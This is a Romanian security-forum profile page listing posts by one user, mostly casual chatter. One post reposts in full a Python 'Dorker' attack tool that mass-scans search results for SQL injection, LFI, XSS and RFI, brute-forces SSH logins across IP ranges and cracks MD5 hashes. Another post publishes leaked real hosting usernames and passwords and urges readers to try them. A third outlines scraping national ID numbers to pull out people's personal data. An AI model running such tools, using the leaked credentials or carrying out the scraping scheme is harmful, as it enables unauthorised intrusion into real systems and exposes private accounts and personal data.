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Everything posted by Gio33

  1. Ba da tu stii sa faci ceva, domnule distrugator de PC-uri ? Iesiti in plm cu cacaturile astea de pe forum, auzi la el vrea sa dea scan si flood da nu stie nimic cu ce se mananca. @aelius
  2. Gio33

    Bunton in CSS

    Vezi pe aici: 40+ CSS Buttons from codepen Si pe aici: 40 CSS3 button examples with effects & animations
  3. Linkul avea un caracter aiurea in el, fiind copiat dupa chat (acesta schimba anumite caractere etc.. zatarra stie ce a facut pe acolo.. ) E ok acum.
  4. La indicatiile lui tex postez asta : https://www.linode.com/docs/contribute Get published by Linode, and get paid! Earn $100 per article, if it’s accepted for publication. We’re expanding the Linode Guides & Tutorials, and we want you to help! If you like writing, teaching people how to use Linux, and money, we want to hear from you. The guidelines are below. Topic List Submit your own topic, or choose from the list of open topics we want to add to the Linode Library: Nginx Tuning and Performance OpenChange WebRTC daemontools - Make sure you write about the tool at the link, as there are several products with similar names Each article is worth $100 if it is accepted for publication. In addition, we always welcome edits, suggestions, and updates to existing guides. Completed Topics These authors got their articles published and $100. You could be next. Varnish Cache - Kevin Cupp Pflogsumm - Robert Accettura SSH Tunnel with SOCKS Proxy - Arnaldo Ariel Arrieta Basic NFS Configuration on Debian 7 - Juan Traverso Configure Postfix to Send Mail Using an External SMTP Server - Santiago Ti MariaDB Setup on Debian 7 - Nashruddin Amin Running Apache with PHP-FPM on Debian and Ubuntu - Jesin A. Using WeeChat for Internet Relay Chat - Samuel Damashek Manage Git Repositories with GitLab on Ubuntu 14.04 (Trusty) - Nashruddin Amin Yesod, Nginx, and MySQL on Debian 7 (Wheezy)- Si-Qi Liu Installing iRedMail on your Linode - Nick Reichley Using StartSSL with the latest Nginx on Debian 7 - Ryan Laverdiere How Much Money Will I Earn? We will pay you $100 per article that is accepted for publication, in cash via PayPal, or as Linode credit. Note that submitting an article is not a guarantee of publication. After you submit it, we will let you know if your article has been accepted. Write Your Article Use the style guide. While you’re writing, make sure your content is: Accurate. Your instructions should be straightforward and technically accurate. Formatted. Your style should use PHP Markdown Extra formatting and match the Linode Library style guide. Original. Your content should be original material written for Linode. We will not accept submissions that have been copied from other sources. Want to make sure you don’t waste time writing a long article we can’t use? Submit a writing sample first, to contribute@linode.com. Submit Your Article Submit your article as a pull request on GitHub, or by emailing it to contribute@linode.com as a plain text or Markdown file attachment. Writing samples are welcome as well. Got images? Attach them as .png or .jpg files. If an image is over 650 pixels wide, please send both the original and a 650-pixel-wide version. Submission checklist: Article in .txt or .md format Images Your name, as you want it to appear in the Library PayPal account information, or Linode account information for Linode credit Once you’ve submitted your article, here’s what you can expect: You’ll receive a brief response acknowledging your submission. We will do a technical review of your material. This will take a few days. We will do a copy review of the article. This will take a few days. You may receive questions or comments from us, or a request for a resubmission with a few changes. We will let you know that your article has been chosen for publication and send you the final version we are planning to publish. You will have 36 hours to respond and approve our publication of the final version. If you respond positively (non-response will be taken as a go-ahead to publish), we will publish the article and give you the cash or Linode credit.
  5. Iei AutoIt Window Info si tragi 'Finder Tool'-ul ala pe ce buton/fereastra vrei, astfel o sa iti arate toate informatiile necesare despre el.
  6. @ cei care sunt in videoclip Respirati aerul degeaba Faceti umbra la pamant degeaba Consumati internetul degeaba Lasati-va de prostii, banii parintilor nu o sa fie forever si nici locurile de casier la Mega Image (oricat de multe magazine si-ar deschide ei).
  7. Nu e facut de mine. Nu incepeti cu intrebari cum se foloseste sau de ce da erori. Posibil sa fie probleme la indentari. #!/usr/bin/env python import re import hashlib import Queue from random import choice import threading import time import urllib2 import sys import socket try: import paramiko PARAMIKO_IMPORTED = True except ImportError: PARAMIKO_IMPORTED = False USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20090824 Firefox/3.5.3", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv: Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)", "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6", "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3" ] option = ' ' vuln = 0 invuln = 0 np = 0 found = [] class Router(threading.Thread): """Checks for routers running ssh with given User/Pass""" def __init__(self, queue, user, passw): if not PARAMIKO_IMPORTED: print 'You need paramiko.' print 'http://www.lag.net/paramiko/' sys.exit(1) threading.Thread.__init__(self) self.queue = queue self.user = user self.passw = passw def run(self): """Tries to connect to given Ip on port 22""" ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) while True: try: ip_add = self.queue.get(False) except Queue.Empty: break try: ssh.connect(ip_add, username = self.user, password = self.passw, timeout = 10) ssh.close() print "Working: %s:22 - %s:%s\n" % (ip_add, self.user, self.passw) write = open('Routers.txt', "a+") write.write('%s:22 %s:%s\n' % (ip_add, self.user, self.passw)) write.close() self.queue.task_done() except: print 'Not Working: %s:22 - %s:%s\n' % (ip_add, self.user, self.passw) self.queue.task_done() class Ip: """Handles the Ip range creation""" def __init__(self): self.ip_range = [] self.start_ip = raw_input('Start ip: ') self.end_ip = raw_input('End ip: ') self.user = raw_input('User: ') self.passw = raw_input('Password: ') self.iprange() def iprange(self): """Creates list of Ip's from Start_Ip to End_Ip""" queue = Queue.Queue() start = list(map(int, self.start_ip.split("."))) end = list(map(int, self.end_ip.split("."))) tmp = start self.ip_range.append(self.start_ip) while tmp != end: start[3] += 1 for i in (3, 2, 1): if tmp[i] == 256: tmp[i] = 0 tmp[i-1] += 1 self.ip_range.append(".".join(map(str, tmp))) for add in self.ip_range: queue.put(add) for i in range(10): thread = Router(queue, self.user, self.passw ) thread.setDaemon(True) thread.start() queue.join() class Crawl: """Searches for dorks and grabs results""" def __init__(self): if option == '4': self.shell = str(raw_input('Shell location: ')) self.dork = raw_input('Enter your dork: ') self.queue = Queue.Queue() self.pages = raw_input('How many pages(Max 20): ') self.qdork = urllib2.quote(self.dork) self.page = 1 self.crawler() def crawler(self): """Crawls Ask.com for sites and sends them to appropriate scan""" print '\nDorking...' for i in range(int(self.pages)): host = "http://uk.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page) req = urllib2.Request(host) req.add_header('User-Agent', choice(USER_AGENT)) response = urllib2.urlopen(req) source = response.read() start = 0 count = 1 end = len(source) numlinks = source.count('_t" href', start, end) while count < numlinks: start = source.find('_t" href', start, end) end = source.find(' onmousedown="return pk', start, end) link = source[start+10:end-1].replace("amp;","") self.queue.put(link) start = end end = len(source) count = count + 1 self.page += 1 if option == '1': for i in range(10): thread = ScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '2': for i in range(10): thread = LScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '3': for i in range(10): thread = XScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '4': for i in range(10): thread = RScanClass(self.queue, self.shell) thread.setDaemon(True) thread.start() self.queue.join() class ScanClass(threading.Thread): """Scans for Sql errors and ouputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.schar = "'" self.file = 'sqli.txt' def run(self): """Scans Url for Sql errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np test = site + self.schar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("error in your SQL syntax", data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('oracle.jdbc.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('system.data.oledb', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('SQL command net properly ended', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('atoracle.jdbc.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('java.sql.sqlexception', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('query failed:', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('postgresql.util.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('mysql_fetch', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('Error:unknown', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('JET Database Engine', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('Microsoft OLE DB Provider for', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('mysql_numrows', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('mysql_num', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('Invalid Query', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('FetchRow', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('JET Database', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('OLE DB Provider for', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('Syntax error', data, re.I)): self.mssql(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def mysql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + W+url else: print O+"MySql: " + url + W write = open(self.file, "a+") write.write('[SQLI]: ' + url + "\n") write.close() def mssql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file).read() if url in read: print G+'Dupe: ' + url + W else: print O+"MsSql: " + url + W write = open (self.file, "a+") write.write('[SQLI]: ' + url + "\n") write.close() class LScanClass(threading.Thread): """Scans for Lfi errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.file = 'lfi.txt' self.queue = queue self.lchar = '../' def run(self): """Checks Url for File Inclusion errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: lsite = site.rsplit('=', 1)[0] if lsite[-1] != "=": lsite = lsite + "=" test = lsite + self.lchar global vuln global invuln global np try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("failed to open stream: No such file or directory", data, re.I)): self.lfi(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def lfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Lfi: " + url + W write = open(self.file, "a+") write.write('[LFI]: ' + url + "\n") write.close() class XScanClass(threading.Thread): """Scan for Xss errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.xchar = """<ScRIpT>alert('xssBYCranky');</ScRiPt>""" self.file = 'xss.txt' def run(self): """Checks Url for possible Xss""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np xsite = site.rsplit('=', 1)[0] if xsite[-1] != "=": xsite = xsite + "=" test = xsite + self.xchar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("xssBYCranky", data, re.I)): self.xss(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def xss(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Xss: " + url + W write = open(self.file, "a+") write.write('[XSS]: ' + url + "\n") write.close() class RScanClass(threading.Thread): """Scans for Rfi errors and outputs to file""" def __init__(self, queue, shell): threading.Thread.__init__(self) self.queue = queue self.file = 'rfi.txt' self.shell = shell def run(self): """Checks Url for Remote File Inclusion vulnerability""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np rsite = site.rsplit('=', 1)[0] if rsite[-1] != "=": rsite = rsite + "=" link = rsite + self.shell + '?' try: conn = urllib2.Request(link) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall('uname -a', data, re.I)): self.rfi(link) vuln += 1 else: print B+link + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def rfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Rfi: " + url + W write = open(self.file, "a+") write.write('[Rfi]: ' + url + "\n") write.close() class Atest(threading.Thread): """Checks given site for Admin Pages/Dirs""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Admin Page/Dir exists""" while True: try: site = self.queue.get(False) except Queue.Empty: break try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) print site found.append(site) self.queue.task_done() except urllib2.URLError: self.queue.task_done() def admin(): """Create queue and threads for admin page scans""" print 'Need to include http:// and ending /\n' site = raw_input('Site: ') queue = Queue.Queue() dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/', 'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php', 'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' ,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php', 'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp', 'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html', 'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php', 'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html', 'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html', 'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html', 'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html', 'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html', 'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html', 'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html', 'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html', 'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php', 'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php', 'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php', 'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 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for add in dirs: test = site + add queue.put(test) for i in range(20): thread = Atest(queue) thread.setDaemon(True) thread.start() queue.join() def aprint(): """Print results of admin page scans""" print 'Search Finished\n' if len(found) == 0: print 'No pages found' else: for site in found: print O+'Found: ' + G+site + W class SDtest(threading.Thread): """Checks given Domain for Sub Domains""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Sub Domain responds""" while True: try: domain = self.queue.get(False) except Queue.Empty: break try: site = 'http://' + domain conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) except urllib2.URLError: self.queue.task_done() else: target = socket.gethostbyname(domain) print 'Found: ' + site + ' - ' + target self.queue.task_done() def subd(): """Create queue and threads for sub domain scans""" queue = Queue.Queue() site = raw_input('Domain: ') sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca", "billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes", "clients", "carro", "connect", "controller", "correoweb", "cpanel", "csg", "customers", "db", "dbs", "demo", "demon", "demostration", "descargas", "developers", "development", "diana", "directory", "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos", "email", "enrutador", "example", "examples", "exchange", "eventos", "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford", "groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d", "imapd", "imaps", "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab", "laboratories", "labs", "library", "linux", "lisa", "login", "logs", "mail", "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil", "mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners", "pcanywhere", "pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research", "restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure", "seguro", "server", "services", "servicios", "servidor", "shop", "shopping", "smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp", "tienda", "unix", "upload", "uploads", "ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1", "ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"] for check in sub: test = check + '.' + site queue.put(test) for i in range(20): thread = SDtest(queue) thread.setDaemon(True) thread.start() queue.join() class Cracker(threading.Thread): """Use a wordlist to try and brute the hash""" def __init__(self, queue, hashm): threading.Thread.__init__(self) self.queue = queue self.hashm = hashm def run(self): """Hash word and check against hash""" while True: try: word = self.queue.get(False) except Queue.Empty: break tmp = hashlib.md5(word).hexdigest() if tmp == self.hashm: self.result(word) self.queue.task_done() def result(self, words): """Print result if found""" print self.hashm + ' = ' + words def word(): """Create queue and threads for hash crack""" queue = Queue.Queue() wordlist = raw_input('Wordlist: ') hashm = raw_input('Enter Md5 hash: ') read = open(wordlist) for words in read: words = words.replace("\n","") queue.put(words) read.close() for i in range(5): thread = Cracker(queue, hashm) thread.setDaemon(True) thread.start() queue.join() class OnlineCrack: """Use online service to check for hash""" def crack(self): """Connect and check hash""" hashm = raw_input('Enter MD5 Hash: ') conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm)) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() if data == 'No results returned.': print '\n- Not found or not valid -' else: print '\n- %s -' % (data) class Check: """Check your current IP address""" def grab(self): """Connect to site and grab IP""" site = 'http://www.tracemyip.org/' try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() start = 0 end = len(data) start = data.find('onclick="', start, end) end = data.find('size=', start, end) ip_add = data[start+46:end-2].strip() print '\nYour current Ip address is %s' % (ip_add) except urllib2.HTTPError: print 'Error connecting' def output(): """Outputs dork scan results to screen""" print '\n>> ' + str(vuln) + G+' vulnerable Sites Found' + W print '>> ' + str(invuln) + G+' Sites Not vulnerable' + W print '>> ' + str(np) + R+' Sites Without Parameters' + W if option == '1': print '>> Output Saved To sqli.txt\n' elif option == '2': print '>> Output Saved To lfi.txt' elif option == '3': print '>> Output Saved To xss.txt' elif option == '4': print '>> Output Saved To rfi.txt' W = "\033[0m"; R = "\033[31m"; G = "\033[32m"; O = "\033[33m"; B = "\033[34m"; def main(): """Outputs Menu and gets input""" quotes = [ '\nprohexuh@gmail.com\n' ] print (O+''' ------------- -- Dorker -- --- v1.5 ---- ---- by ----- --- Cranky ---- -------------''') print (G+''' -[1]- SQLi -[2]- LFI -[3]- XSS -[4]- RFI -[5]- Proxy -[6]- Admin Page Finder -[7]- Sub Domain Scan -[8]- Dictionary MD5 cracker -[9]- Online MD5 cracker -[10]- Check your IP address''') print (B+''' -[!]- If freeze while running or want to quit, just Ctrl C, it will automatically terminate the job. ''') print W global option option = raw_input('Enter Option: ') if option: if option == '1': Crawl() output() print choice(quotes) elif option == '2': Crawl() output() print choice(quotes) elif option == '3': Crawl() output() print choice(quotes) elif option == '4': Crawl() output() print choice(quotes) elif option == '5': Ip() print choice(quotes) elif option == '6': admin() aprint() print choice(quotes) elif option == '7': subd() print choice(quotes) elif option == '8': word() print choice(quotes) elif option == '9': OnlineCrack().crack() print choice(quotes) elif option == '10': Check().grab() print choice(quotes) else: print R+'\nInvalid Choice\n' + W time.sleep(0.9) main() else: print R+'\nYou Must Enter An Option (Check if your typo is corrected.)\n' + W time.sleep(0.9) main() if __name__ == '__main__': main() Pastebin: [Python] #!/usr/bin/env python import re import hashlib import Queue from random impo - Pastebin.com
  8. Am gasit din intamplare pe un pastebin un document cu multe accese, verificati si voi ce merge si ce sunt unele (nici eu nu m-am prins la unele ). Ele dateaza din 23 Apr 2014, deci posibil f multe sa nu mai mearga, worth trying totusi. Have fun PS: daca esti autorul acestui document, ar fi trebuit sa il pui privat, sorry PS2: bafta la metinari http://west-zone.ro/info.php http://gumptious.ro/?t-t ///////hostingspace.ro////// http://www.hostingspace.ro/?t-t ///////extreamhost.ro//////// extreamhost.com Username:root@extreamhost.com Pass:123123123a cc https://www.extreamhost.com/forum/delete.php?t-t http://4metin.ro/new/caracter.php?t-t http://4metin.ro/sitemap.php?t-t http://4metin.ro/adm/index.php?t-t http://4metin.ro/viewtopic.php?t-t lauradmin dICborA8 gsppanel 1 contact@extreamhost.com wHiGs6tegs$ cpanel 1 root Xtre@m!x //////// domain User Pass IP's ramos.ro ramosro V8lJbYU1UT serviciiwww.ro servicii parolahost apartamente-noi.ro apart parolamea apartamente-noi.net apartame xtreme gdv.ro gdvro parolamea mri.com.ro mricomro mri mycdent.com mycdent manuelpass topbestfree.com topbestf wumqiYNHlE plangeficatul.ro plangefi 13KC90Pf3 dalv.ro dalvro 135dalv110 hva-technology.com hvatech hbghbg media-contact.ro mediac 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  11. Password shown in the "code" is crypted with <check the hint>, solve the hint and find the encryption method.
  12. Diferenta e ca daca donezi ceva face 2 face poti sa iti faci o parere despre omu respectiv, poate ca il vezi in necesitate de acel bun pe care tu il oferi. (iti faci o parere despre el daca ti se pare sarac etc) Asa pe un forum stai si te gandesti ca poate tu ii trimiti si ala face bisnita cu ele pe olx, asa intr-un utilizator cu o anumita reputatie ai avea incredere ca nu e un bisnitar.
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  15. Nice... hai sa luam un demo website din VS2010 de ASP.NET , ii schimbam DB-ul , cateva selecturi drop-down, niste texte un SELECT , o treaba... hai cu milioanele de euro. Sa facem un calcul la cel mai grosolan mod: 10 000 E - servere 2 000 E - proiectarea DB 1 000 E - realizarea site-ului inspirat din demo-ul acela 5 000 E - inserarea datelor in sistem Total 18 000 E, hai sa zicem 20 000 (desi sa fim realisti, e exagerat tot ce am zis) , totusi.. 36 mil euro? =)) Si vine omu asta si zice ca ne da 15 bitcoin si 0,5 daca ii si explicam cum sa repare vulnerabilitatile... Iesi acas'
  16. Ok, deci tu defapt vrei un security audit, macar zi asa de la inceput. Scris cu picioarele pentru ca: Ai 1000 de <script> uri deschise, se vede ca unele sunt copiate / inspirate din altceva fiindca odata deschizi ghilimele simple, odata duble etc <script type='text/javascript'>... <script type="text/javascript">... De cand tagurile <td> se inchid in acelasi tag asa cum e aici, da, poate ca unele browsere nu fac gura fiindca s-au obisnuit stupid-proof, dar e retardat... : <td class="label" /> Au fost doar 2 exemple simple. Dupa o cautare, se pare ca aplicatia a fost facuta dupa un "demo" ASP.NET din vs 2010, cu date de conectare la db modificate si inca 2-3 texte probabil, deci, miroase a incepatori. Sa mai intreb cati bani s-au platit pe saracia asta?
  17. De unde stim noi ca tu nu esti creatorul sau administratorul magariei de site scrisa cu picioarele si vrei sa verifici daca ai vuln pe site, ai 1 post si user inregistrat azi probabil. Asta confirma destul de mult ceea ce am zis mai sus, deci, daca vreti un audit de securitate la site, ziceti frate direct asa. Sa scoti daca asiguratii sunt sau nu asigurati medical nu e greu, faci un script cu un captcha-sniper si il rulezi pe toate cnp-urile, apoi concatenezi rezultatele cu o baza de date de cnp -> date personale ...
  18. Gio33


    Invatati si voi sa cititi hint-urile si sa aplicati, va trebuie un minim de cunostinte pentru dezlegare. Oricum stati linistiti ca nu e mare rahat in log-urile alea, metinarii o sa fie fericiti.
  19. Parerea mea, haine de dama aduse din dragonu rosu, cautat furnizori chinezi etc de chestii frumoase, mai ales daca o femeie se va ocupa de magazin, cu atat mai bine ... Multa reclama pe facebook.
  20. Faza asta e de multi ani, a revenit iar moda ?
  21. Cel mai probabil a pus mana vreun copilas pe un script de autopost ceva pe bloguri, luat de pe forum ceva, si a lasat asa mailu, oricum nu conteaza mailu ce-l treci la un comment, ideea e sa apara linku si sa nu aiba rel="nofollow". Deci.. neinteresant.
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  24. Trebuie 10k+ ip-uri ca sa ai sperante la ceva.
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